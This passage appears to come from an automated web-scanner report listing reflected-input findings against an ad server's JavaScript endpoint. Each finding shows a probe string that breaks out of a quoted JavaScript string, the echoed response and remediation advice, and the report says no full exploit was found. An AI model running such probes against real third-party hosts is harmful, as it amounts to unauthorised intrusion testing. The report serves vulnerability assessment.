Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:54 GMT
Date: Sat, 26 Feb 2011 01:49:54 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542cee84';fb335840d2c%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.206. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb585'%3bfb49cec39f9 was submitted in the REST URL parameter 4. This input was echoed as cb585';fb49cec39f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305cb585'%3bfb49cec39f9/0/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591972
Expires: Mon, 28 Mar 2011 01:49:03 GMT
Date: Sat, 26 Feb 2011 01:49:31 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305cb585';fb49cec39f9%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.207. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0efa'%3be267596c3ab was submitted in the REST URL parameter 5. This input was echoed as c0efa';e267596c3ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0c0efa'%3be267596c3ab/0/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591949
Expires: Mon, 28 Mar 2011 01:48:44 GMT
Date: Sat, 26 Feb 2011 01:49:35 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0c0efa';e267596c3ab,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.208. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e74a'%3bbdfb1e10276 was submitted in the REST URL parameter 6. This input was echoed as 7e74a';bdfb1e10276 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/07e74a'%3bbdfb1e10276/203687985/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2591985
Expires: Mon, 28 Mar 2011 01:49:23 GMT
Date: Sat, 26 Feb 2011 01:49:38 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,07e74a';bdfb1e10276%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.209. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3891'%3ba2a152fce1c was submitted in the REST URL parameter 7. This input was echoed as d3891';a2a152fce1c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985d3891'%3ba2a152fce1c/203687985//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1517
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:41 GMT
Date: Sat, 26 Feb 2011 01:49:41 GMT
Connection: close


var zzADS_CHAN = '203687985d3891';a2a152fce1c';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = zzPage_obj[zzADS_CHAN].zzTrd;

...[SNIP]...

3.210. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a25ba'%3bfe48c25a940 was submitted in the REST URL parameter 8. This input was echoed as a25ba';fe48c25a940 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985a25ba'%3bfe48c25a940//0/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1499
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:44 GMT
Date: Sat, 26 Feb 2011 01:49:44 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985a25ba';fe48c25a940%3Bi=0%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.211. http://e2.cdn.qnsr.com//cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142454/2305/0/0/203687985/203687985//0/203/9542//3000007/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f04ab'%3b12625b2384 was submitted in the REST URL parameter 9. This input was echoed as f04ab';12625b2384 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142454/2305/0/0/203687985/203687985//0f04ab'%3b12625b2384/203/9542//3000007/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1498
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:47 GMT
Date: Sat, 26 Feb 2011 01:49:47 GMT
Connection: close


var zzADS_CHAN = '203687985';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
CRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.6;sz=300x250;click0=http://o1.qnsr.com//cgi/c%3Fa=20142454%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0f04ab';12625b2384%3Bn=203%3Bs=9542%3B%3Bq=1%3Bk=' + zz_trd + ';ord=123456?">
...[SNIP]...

3.212. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e63'%3bd4fe3ee258f was submitted in the REST URL parameter 10. This input was echoed as 46e63';d4fe3ee258f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//0/20346e63'%3bd4fe3ee258f/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2591995
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:48 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=0;n=20346e63';d4fe3ee258f;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.213. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ba7'%3bd9c36cdc5fd was submitted in the REST URL parameter 11. This input was echoed as 83ba7';d9c36cdc5fd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/954283ba7'%3bd9c36cdc5fd//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:52 GMT
Date: Sat, 26 Feb 2011 01:49:52 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105;c=203687990,203687990;i=0;n=203;s=954283ba7';d9c36cdc5fd;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.214. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 864ff'%3bc2f0de444d5 was submitted in the REST URL parameter 4. This input was echoed as 864ff';c2f0de444d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105864ff'%3bc2f0de444d5/0/0/203687990/203687990//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Content-Length: 1711
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:32 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close


var zzADS_CHAN = '203687990';
if (typeof zzPage_obj != 'undefined' && typeof zzPage_obj[zzADS_CHAN] != 'undefined') {
var zzStr = zzPage_obj[zzADS_CHAN].zzStr;
var zzTrd = z
...[SNIP]...
<a href="http://o1.qnsr.com//cgi/c?a=20142921;x=15105864ff';c2f0de444d5;c=203687990,203687990;i=0;n=203;s=9542;q=1;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://altfarm.mediaplex.com/ad/ck/12309-121202-25586-3?mpt=%r">
...[SNIP]...

3.215. http://e2.cdn.qnsr.com//cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20142921/15105/0/0/203687990/203687990//0/203/9542//1000003/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c00dc'%3bc26396354fa was submitted in the REST URL parameter 7. This input was echoed as c00dc';c26396354fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //cgi/k/20142921/15105/0/0/203687990c00dc'%3bc26396354fa/203687990//0/203/9542//1000003/i.js HTTP/1.1
Host: e2.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
